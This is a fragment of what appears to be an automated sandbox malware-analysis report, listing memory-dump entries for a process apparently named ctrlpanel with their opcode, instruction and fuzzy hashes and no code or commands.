                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 9c94f248dc374b87d2ce5776109446dfa44fe7fabd6b6b7740dfd369816eea33
                              • Instruction ID: 5618caf50c0011b7322396a479e8df17cae8bbb910e42d5b5eb0c657c2b84ec2
                              • Opcode Fuzzy Hash: 9c94f248dc374b87d2ce5776109446dfa44fe7fabd6b6b7740dfd369816eea33
                              • Instruction Fuzzy Hash: 1DE0E5A161A7894FE795EFA88415288BB94BF55301F4841AAE04DCB193CA74AC44C701
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 0a42ccab11274430119b50f6fda6118b667a304a98f4053f14f307badfe2e6c6
                              • Instruction ID: ac1dc18e7a3f39a412e666329ec12a174e8640c98a90dd65e4c079dbd25fb08c
                              • Opcode Fuzzy Hash: 0a42ccab11274430119b50f6fda6118b667a304a98f4053f14f307badfe2e6c6
                              • Instruction Fuzzy Hash: 4CE0488270BB894BD751AFF80459519B9C4AF6560575400AAD089C72D3CD19AC408346
                              Memory Dump Source
                              • Source File: 00000005.00000002.4072312869.00007FFD99FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FB0000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_5_2_7ffd99fb0000_ctrlpanel.jbxd
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 97982d08368f8cae3b4d89eb6bfc2784e923b510be57e81f6105181a297e7f21
                              • Instruction ID: 3058f85d1a6a521409bc3069046ef5bae704703915d0101376a0f352cc29d347
                              • Opcode Fuzzy Hash: 97982d08368f8cae3b4d89eb6bfc2784e923b510be57e81f6105181a297e7f21
                              • Instruction Fuzzy Hash: B7B02B83B0D7844BD6602EB4100501076D09F21601304066CD0C983193CC14AC008204